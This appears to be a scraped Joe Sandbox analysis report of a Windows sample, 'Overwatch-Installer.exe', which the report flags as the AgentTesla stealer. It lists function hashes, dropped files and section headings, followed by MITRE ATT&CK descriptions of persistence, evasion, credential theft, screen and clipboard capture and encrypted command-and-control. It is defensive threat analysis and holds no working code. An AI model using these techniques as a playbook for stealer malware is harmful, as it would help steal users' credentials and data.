API String ID:
Opcode ID: 388ccc0cf5cc134f5b1b6ee340f03b9116c67441f5448d1b14bb176ff446a258
Instruction ID: 2d97475d570049b29540ba2d618537c700bd644627b564ba159b5302bf1c7dd6
Opcode Fuzzy Hash: 388ccc0cf5cc134f5b1b6ee340f03b9116c67441f5448d1b14bb176ff446a258
Instruction Fuzzy Hash: 01E0D8B254020067D2508F069C45F62FB98DB90A30F08C557EE085F742E175B6188AF1

Function 01090C08 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461877567.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1090000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84181feea70113f80d50d753097b847a4c252dbcde1edfbfc191e3924db94975
Instruction ID: a4b99fc5a2ed636cb2484551826bee212dc8cbafd052f99ad0f7627c9dd7d99d
Opcode Fuzzy Hash: 84181feea70113f80d50d753097b847a4c252dbcde1edfbfc191e3924db94975
Instruction Fuzzy Hash: CCD0A7313000645B0908236E90248BE73DF8FCA56530A00BAE106CB391DE559C0143E6

Function 00A623F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461431058.0000000000A62000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A62000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a62000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4858291592faf23a70e2ba94c15f039087c03d27b162ce36b74eef207de2407
Instruction ID: 67d95da57f794427c5a163de46f4c4470b714867990ac3a052d1b97ed865b007
Opcode Fuzzy Hash: f4858291592faf23a70e2ba94c15f039087c03d27b162ce36b74eef207de2407
Instruction Fuzzy Hash: 13D05E79245AC14FD3169B1CC2ACBA937E4AF51714F4A44F9A8408BB63CB68E9C5D600

Function 00A623BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2461431058.0000000000A62000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A62000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a62000_nefgd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b233b35640fd9796157d0b7b2081be4cd42dc2b48a704c1a5233b86f1fc464
Instruction ID: dad28af1a768fca67e72ea7cebada6a7a54da4a2bf3d372e3d78c84376186fc1
Opcode Fuzzy Hash: 77b233b35640fd9796157d0b7b2081be4cd42dc2b48a704c1a5233b86f1fc464
Instruction Fuzzy Hash: DED05E34200A814BD715DB0CC2D4F9937E4AB40714F0644E9AC108F762C7A8E8C4CA00

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Overwatch-Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8D0.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE9D.tmp.xml

C:\Users\user\AppData\Roaming\ScreenShot\screen.jpeg

C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

C:\Users\user\AppData\Roaming\nefgd\nefgd.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
Overwatch-Installer.exe

Function 052F1D68 Relevance: 1.6, APIs: 1, Instructions: 128
libraryCOMMON

Function 0670EAA8 Relevance: 1.9, APIs: 1, Instructions: 437
libraryCOMMON

Function 06870F00 Relevance: 1.8, APIs: 1, Instructions: 331
libraryCOMMON

Function 06870EF1 Relevance: 1.8, APIs: 1, Instructions: 318
libraryCOMMON

Function 06870070 Relevance: 1.7, APIs: 1, Instructions: 196
libraryCOMMON

Function 06873ECE Relevance: 1.6, APIs: 1, Instructions: 141
libraryCOMMON

Function 06873F28 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Function 06870007 Relevance: 1.6, APIs: 1, Instructions: 103
libraryCOMMON

Function 0112BD62 Relevance: 1.6, APIs: 1, Instructions: 103
fileCOMMON

Function 05BF1F1F Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre